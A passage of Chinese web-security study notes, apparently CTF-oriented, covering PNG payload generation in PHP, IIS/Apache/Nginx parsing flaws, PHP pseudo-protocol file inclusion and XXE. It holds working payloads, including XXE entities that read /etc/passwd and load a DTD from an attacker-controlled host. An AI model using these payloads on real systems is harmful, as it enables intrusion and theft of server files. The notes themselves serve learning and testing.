#F78C6C">0x5a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x01</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xdc</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa3</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x9f</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x67</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa5</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xbe</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5f</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x76</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x74</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x4c</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa1</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x3f</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x7a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xbf</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x30</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x6b</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x88</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x2d</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x60</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x65</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x7d</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x52</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x9d</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xad</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x88</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xa1</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x66</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x44</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x50</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x33</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">img </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">imagecreatetruecolor</span><span style="color: #89DDFF">(</span><span style="color: #F78C6C">32</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">32</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF; font-style: italic">for</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">y </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">y </span><span style="color: #89DDFF"><</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">sizeof</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">y </span><span style="color: #89DDFF">+=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">3</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">r </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">[$</span><span style="color: #BABED8">y</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">g </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">[$</span><span style="color: #BABED8">y</span><span style="color: #89DDFF">+</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">p</span><span style="color: #89DDFF">[$</span><span style="color: #BABED8">y</span><span style="color: #89DDFF">+</span><span style="color: #F78C6C">2</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">color </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">imagecolorallocate</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">img</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">r</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">g</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">imagesetpixel</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">img</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">round</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">y </span><span style="color: #89DDFF">/</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">3</span><span style="color: #89DDFF">),</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">color</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #82AAFF">imagepng</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">img</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./1.png</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li></ul><h3 id="中间件解析漏洞"><a href="#中间件解析漏洞" class="headerlink" title="中间件解析漏洞"></a>中间件解析漏洞</h3><p><a href="https://blog.csdn.net/m0_64378913/article/details/125067293">中间件文件解析漏洞概述及实例——Apache、IIS和Nginx_中间件解析漏洞-CSDN博客</a></p><h4 id="IIS-5-x-6-x"><a href="#IIS-5-x-6-x" class="headerlink" title="IIS 5.x-6.x"></a>IIS 5.x-6.x</h4><ul><li>文件解析: iis6.0下,<strong>分号后面的不被解析</strong>, <code>xx.asp;.jpg</code>被解析为asp</li><li>目录解析: 名字为<code>.asp</code>、<code>.asa</code>的<strong>文件夹</strong>, 其下任何扩展名的文件都被IIS当做<strong>asp文件</strong>来解析并执行</li></ul><h4 id="IIS7-5"><a href="#IIS7-5" class="headerlink" title="IIS7.5"></a>IIS7.5</h4><ul><li>与nginx的类似</li></ul><h4 id="apache"><a href="#apache" class="headerlink" title="apache"></a>apache</h4><h5 id="换行解析"><a href="#换行解析" class="headerlink" title="换行解析"></a>换行解析</h5><ul><li><p>利用前提: 黑名单验证(不能上传php jsp等) version: 2.4.0~2.4.29</p></li><li><p>在解析PHP时,<code>1.php%0A</code>将被按照PHP后缀进行解析(%0a为换行)</p></li></ul><h5 id="多后缀解析"><a href="#多后缀解析" class="headerlink" title="多后缀解析"></a>多后缀解析</h5><ul><li><p>Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令</p></li><li><p>如果添加了如下配置, <code>1.php.png</code>可以当成php解析</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">AddHandler application/x-httpd-php .php</span></span></code></pre></div></li></ul><h4 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h4><h5 id="文件名逻辑漏洞"><a href="#文件名逻辑漏洞" class="headerlink" title="文件名逻辑漏洞"></a>文件名逻辑漏洞</h5><ul><li><code>1.gif[0x20][0x00].php</code>Nginx却错误地认为请求的文件是<code>1.gif[0x20]</code></li></ul><h5 id="解析漏洞"><a href="#解析漏洞" class="headerlink" title="解析漏洞"></a>解析漏洞</h5><ul><li>用户配置不当造成漏洞</li><li><code>http://ip/1.png</code>访问图片, <code>http://ip/1.png/.php</code>解析图片为php</li></ul><h3 id="编辑器漏洞"><a href="#编辑器漏洞" class="headerlink" title="编辑器漏洞"></a>编辑器漏洞</h3><ul><li><a href="https://blog.csdn.net/weixin_45329947/article/details/122712440">Ueditor、FCKeditor、Kindeditor编辑器漏洞_kindeditor漏洞-CSDN博客</a></li></ul><h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><h3 id="思路要点"><a href="#思路要点" class="headerlink" title="思路要点"></a>思路要点</h3><h4 id="黑盒-1"><a href="#黑盒-1" class="headerlink" title="黑盒"></a>黑盒</h4><ul><li>主要观察<strong>参数传递</strong>的数据和文件名是否对应</li></ul><h4 id="白盒-1"><a href="#白盒-1" class="headerlink" title="白盒"></a>白盒</h4><ol><li>可通过应用功能追踪代码定位审计</li><li>可通过却本特定函数搜索定位审计</li><li>可通过<strong>伪协议</strong>玩法绕过相关修复等</li></ol><h3 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h3><p><a href="https://segmentfault.com/a/1190000018991087">PHP伪协议总结 - 个人文章 - SegmentFault 思否</a></p><h4 id="file-协议"><a href="#file-协议" class="headerlink" title="file 协议"></a>file 协议</h4><h5 id="条件-1"><a href="#条件-1" class="headerlink" title="条件"></a>条件</h5><ul><li><code>allow_url_fopen</code>:off/on</li><li><code>allow_url_include</code> :off/on</li></ul><h5 id="示例-1"><a href="#示例-1" class="headerlink" title="示例"></a>示例</h5><ul><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt</span></span></code></pre></div></li><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">?file=./phpinfo.txt</span></span></code></pre></div></li></ul><h4 id="php-协议"><a href="#php-协议" class="headerlink" title="php 协议"></a>php 协议</h4><p><strong>条件</strong></p><ul><li><code>allow_url_fopen</code>:off/on</li><li><code>allow_url_include</code> :仅<code>php://input php://stdin php://memory php://temp </code>需要on</li></ul><table><thead><tr><th>协议</th><th>作用</th></tr></thead><tbody><tr><td><strong>php://input</strong></td><td>可以访问请求的原始数据的只读流,在POST请求中访问POST的<code>data</code>部分,在<code>enctype="multipart/form-data"</code> 的时候<code>php://input </code>是无效的。</td></tr><tr><td>php://output</td><td>只写的数据流,允许以 print 和 echo 一样的方式写入到输出缓冲区。</td></tr><tr><td>php://fd</td><td>(>=5.3.6)允许直接访问指定的文件描述符。例如 <code>php://fd/3</code> 引用了文件描述符 3。</td></tr><tr><td>php://memory php://temp</td><td>(>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据。两者的唯一区别是 <code>php://memory</code> 总是把数据储存在内存中,而 <code>php://temp</code> 会在内存量达到预定义的限制后(默认是 <code>2MB</code>)存入临时文件中。临时文件位置的决定和 <code>sys_get_temp_dir()</code> 的方式一致。</td></tr><tr><td><strong>php://filter</strong></td><td>(>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体式<code>(all-in-one)</code>的文件函数非常有用,类似 <code>readfile()</code>、<code>file()</code> 和 <code>file_get_contents()</code>,在数据流内容读取之前没有机会应用其他过滤器。</td></tr></tbody></table><h5 id="php-filter参数详解"><a href="#php-filter参数详解" class="headerlink" title="php://filter参数详解"></a><code>php://filter</code>参数详解</h5><table><thead><tr><th>php://filter 参数</th><th>描述</th></tr></thead><tbody><tr><td>resource=<要过滤的数据流></td><td>必须项。它指定了你要筛选过滤的数据流。</td></tr><tr><td>read=<读链的过滤器></td><td>可选项。可以设定一个或多个过滤器名称,以管道符(<em>\ </em>)分隔。</td></tr><tr><td>write=<写链的过滤器></td><td>可选项。可以设定一个或多个过滤器名称,以管道符(\)分隔。</td></tr><tr><td><; 两个链的过滤器></td><td>任何没有以 <em>read=</em> 或 <em>write=</em> 作前缀的筛选器列表会视情况应用于读或写链。</td></tr></tbody></table><p>示例:</p><p><code>php://filter/read=convert.base64-encode/resource=[文件名]</code>读取文件源码(针对php文件需要base64编码)</p><h4 id="data-协议"><a href="#data-协议" class="headerlink" title="data 协议"></a>data 协议</h4><h5 id="条件-2"><a href="#条件-2" class="headerlink" title="条件"></a>条件</h5><ul><li><code>allow_url_fopen</code>:on</li><li><code>allow_url_include</code> :on</li></ul><h5 id="示例-2"><a href="#示例-2" class="headerlink" title="示例"></a>示例</h5><ul><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">?file=data://text/plain,<?php%20phpinfo();?></span></span></code></pre></div></li><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span></span></code></pre></div></li></ul><h4 id="http-https-协议"><a href="#http-https-协议" class="headerlink" title="http & https 协议"></a>http & https 协议</h4><h5 id="条件-3"><a href="#条件-3" class="headerlink" title="条件"></a>条件</h5><ul><li><code>allow_url_fopen</code>:on</li><li><code>allow_url_include</code> :on</li></ul><h5 id="作用"><a href="#作用" class="headerlink" title="作用"></a>作用</h5><ul><li>通常用于远程包含</li></ul><h5 id="示例-3"><a href="#示例-3" class="headerlink" title="示例"></a>示例</h5><ul><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">?file=http://127.0.0.1/phpinfo.txt</span></span></code></pre></div></li></ul><h3 id="LFI-本地文件包含"><a href="#LFI-本地文件包含" class="headerlink" title="LFI 本地文件包含"></a>LFI 本地文件包含</h3><ul><li>通过文件上传</li><li>借助日志(UA头), session写入</li><li>伪协议+编码解码</li></ul><h2 id="XXE-–-XML-External-Entity-Injection"><a href="#XXE-–-XML-External-Entity-Injection" class="headerlink" title="XXE – XML External Entity Injection"></a>XXE – XML External Entity Injection</h2><p><a href="https://www.cnblogs.com/20175211lyz/p/11413335.html">CTF XXE - MustaphaMond - 博客园 (cnblogs.com)</a></p><ul><li>全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。</li><li>危害: 文件读取, 端口探针等</li></ul><h3 id="XML"><a href="#XML" class="headerlink" title="XML"></a>XML</h3><h4 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h4><ul><li><p><code>XML</code>即 可扩展标记语言(EXtensible Markup Language),是一种标记语言,其标签没有预定义,您需要自行定义标签,是W3C的推荐标准。其于HTML的区别是:</p><ul><li>HTML 被设计用来显示数据</li><li>XML 被设计用来传输和存储数据</li></ul></li><li><p>XML文档结构包括:</p><ul><li>XML声明</li><li>DTD文档类型定义(可选)</li><li>文档元素</li></ul></li><li><p>示例:</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic"><!--XML声明--></span></span><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #F07178">xml</span><span style="color: #C792EA"> version</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1.0</span><span style="color: #89DDFF">"</span><span style="color: #C792EA"> encoding</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">UTF-8</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">?></span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic"><!--DTD,这部分可选的--></span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">foo</span><span style="color: #89DDFF"> [ </span></span><span class="line"><span style="color: #89DDFF"> <!ELEMENT foo ANY ></span></span><span class="line"><span style="color: #89DDFF"> <!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">xxe</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">file:///c:/windows/win.ini</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ></span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic"><!--文档元素--></span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">foo</span><span style="color: #89DDFF">>&</span><span style="color: #BABED8">xxe</span><span style="color: #89DDFF">;</</span><span style="color: #F07178">foo</span><span style="color: #89DDFF">></span></span></code></pre></div></li></ul><h4 id="DTD"><a href="#DTD" class="headerlink" title="DTD"></a>DTD</h4><ul><li><p>文档类型定义(DTD)用来为XML文档定义语义约束, 可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。</p></li><li><p>DTD一般认为有两种引用或声明方式:</p><ul><li><p>1、内部DTD:即对XML文档中的元素、属性和实体的DTD的声明都在XML文档中。</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><!DOCTYPE note [</span></span><span class="line"><span style="color: #babed8"> <!ENTITY a "admin"></span></span><span class="line"><span style="color: #babed8">]></span></span><span class="line"><span style="color: #babed8"><note>&a</note></span></span><span class="line"><span style="color: #babed8"><!-- admin --></span></span></code></pre></div></li><li><p>2、外部DTD:即对XML文档中的元素、属性和实体的DTD的声明都在一个独立的DTD文件(.dtd)中。</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><!DOCTYPE note> [</span></span><span class="line"><span style="color: #babed8"> <!ENTITY c SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php"></span></span><span class="line"><span style="color: #babed8">]></span></span><span class="line"><span style="color: #babed8"><note>&c</note></span></span><span class="line"><span style="color: #babed8"><!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --></span></span></code></pre></div></li></ul></li><li><p>实体声明方式:</p><ul><li><p>内部实体</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">note</span><span style="color: #89DDFF"> [</span></span><span class="line"><span style="color: #89DDFF"> <!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">a</span><span style="color: #89DDFF"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">admin</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span><span style="color: #BABED8">&a</span><span style="color: #89DDFF"></</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #676E95; font-style: italic"><!-- admin --></span></span></code></pre></div></li><li><p>参数实体</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">note</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> [</span></span><span class="line"><span style="color: #BABED8"> <!ENTITY % b "<!ENTITY b1 "awsl">"></span></span><span class="line"><span style="color: #BABED8"> %b;</span></span><span class="line"><span style="color: #BABED8">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span><span style="color: #BABED8">&b1</span><span style="color: #89DDFF"></</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #676E95; font-style: italic"><!-- awsl --></span></span></code></pre></div><ul><li>参数实体用<code>% name</code>申明,引用时用<code>%name;</code>,只能在DTD中申明,DTD中引用。</li><li>其余实体直接用<code>name</code>申明,引用时用<code>&name;</code>,只能在DTD中申明,可在xml文档中引用</li></ul></li><li><p>外部实体</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">note</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> [</span></span><span class="line"><span style="color: #BABED8"> <!ENTITY c SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php"></span></span><span class="line"><span style="color: #BABED8">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span><span style="color: #BABED8">&c</span><span style="color: #89DDFF"></</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #676E95; font-style: italic"><!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --></span></span></code></pre></div><ul><li>外部引用可支持http,file等协议</li></ul></li><li><p>外部参数实体</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">note</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> [</span></span><span class="line"><span style="color: #BABED8"> <!ENTITY % d SYSTEM "http://47.106.143.26/xml.dtd"></span></span><span class="line"><span style="color: #BABED8"> %d;</span></span><span class="line"><span style="color: #BABED8">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span><span style="color: #BABED8">&d1</span><span style="color: #89DDFF"></</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #676E95; font-style: italic"><!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --></span></span></code></pre></div><p><code>http://47.106.143.26/xml.dtd</code>:</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic"><!-- http://47.106.143.26/xml.dtd --></span></span><span class="line"><span style="color: #BABED8"><!ENTITY d1 SYSTEM "data://text/plain;base64,Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA=="></span></span></code></pre></div></li></ul></li></ul><h3 id="XML外部实体注入-XXE"><a href="#XML外部实体注入-XXE" class="headerlink" title="XML外部实体注入(XXE)"></a>XML外部实体注入(XXE)</h3><h4 id="漏洞发现"><a href="#漏洞发现" class="headerlink" title="漏洞发现"></a>漏洞发现</h4><h5 id="黑盒-2"><a href="#黑盒-2" class="headerlink" title="黑盒"></a>黑盒</h5><ul><li>获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试</li><li>不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试XXE</li><li>XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行</li></ul><h5 id="白盒-2"><a href="#白盒-2" class="headerlink" title="白盒"></a>白盒</h5><ul><li><p>可通过应用功能追踪代码定位审计</p></li><li><p>可通过脚本特定函数搜索定位审计</p></li><li><p>可通过伪协议玩法绕过相关修复等</p></li></ul><h4 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>任意文件读取</h4><h5 id="有回显"><a href="#有回显" class="headerlink" title="有回显"></a>有回显</h5><ul><li><p>直接读靶机文件</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #F07178">xml</span><span style="color: #C792EA"> version</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1.0</span><span style="color: #89DDFF">"</span><span style="color: #C792EA"> encoding</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">UTF-8</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ?></span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">foo</span><span style="color: #89DDFF"> [ </span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">rabbit</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">file:///flag</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ></span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">user</span><span style="color: #89DDFF">><</span><span style="color: #F07178">username</span><span style="color: #89DDFF">>&</span><span style="color: #BABED8">rabbit</span><span style="color: #89DDFF">;</</span><span style="color: #F07178">username</span><span style="color: #89DDFF">><</span><span style="color: #F07178">password</span><span style="color: #89DDFF">></span><span style="color: #BABED8">123</span><span style="color: #89DDFF"></</span><span style="color: #F07178">password</span><span style="color: #89DDFF">></</span><span style="color: #F07178">user</span><span style="color: #89DDFF">></span></span></code></pre></div></li><li><p>恶意引入外部参数实体</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #F07178">xml</span><span style="color: #C792EA"> version</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1.0</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ?></span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">test</span><span style="color: #89DDFF"> [</span></span><span class="line"><span style="color: #89DDFF"> <!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> % </span><span style="color: #BABED8">file</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">http://vps-ip/hack.dtd</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"> %file;</span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">test</span><span style="color: #89DDFF">>&</span><span style="color: #BABED8">hhh</span><span style="color: #89DDFF">;</</span><span style="color: #F07178">test</span><span style="color: #89DDFF">></span></span></code></pre></div><p>hack.dtd:</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8"><!ENTITY hhh SYSTEM 'file:///etc/passwd'></span></span></code></pre></div></li></ul><h5 id="无回显"><a href="#无回显" class="headerlink" title="无回显"></a>无回显</h5><ul><li><p>先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx。</p><div class="language-xml"><button title="Copy 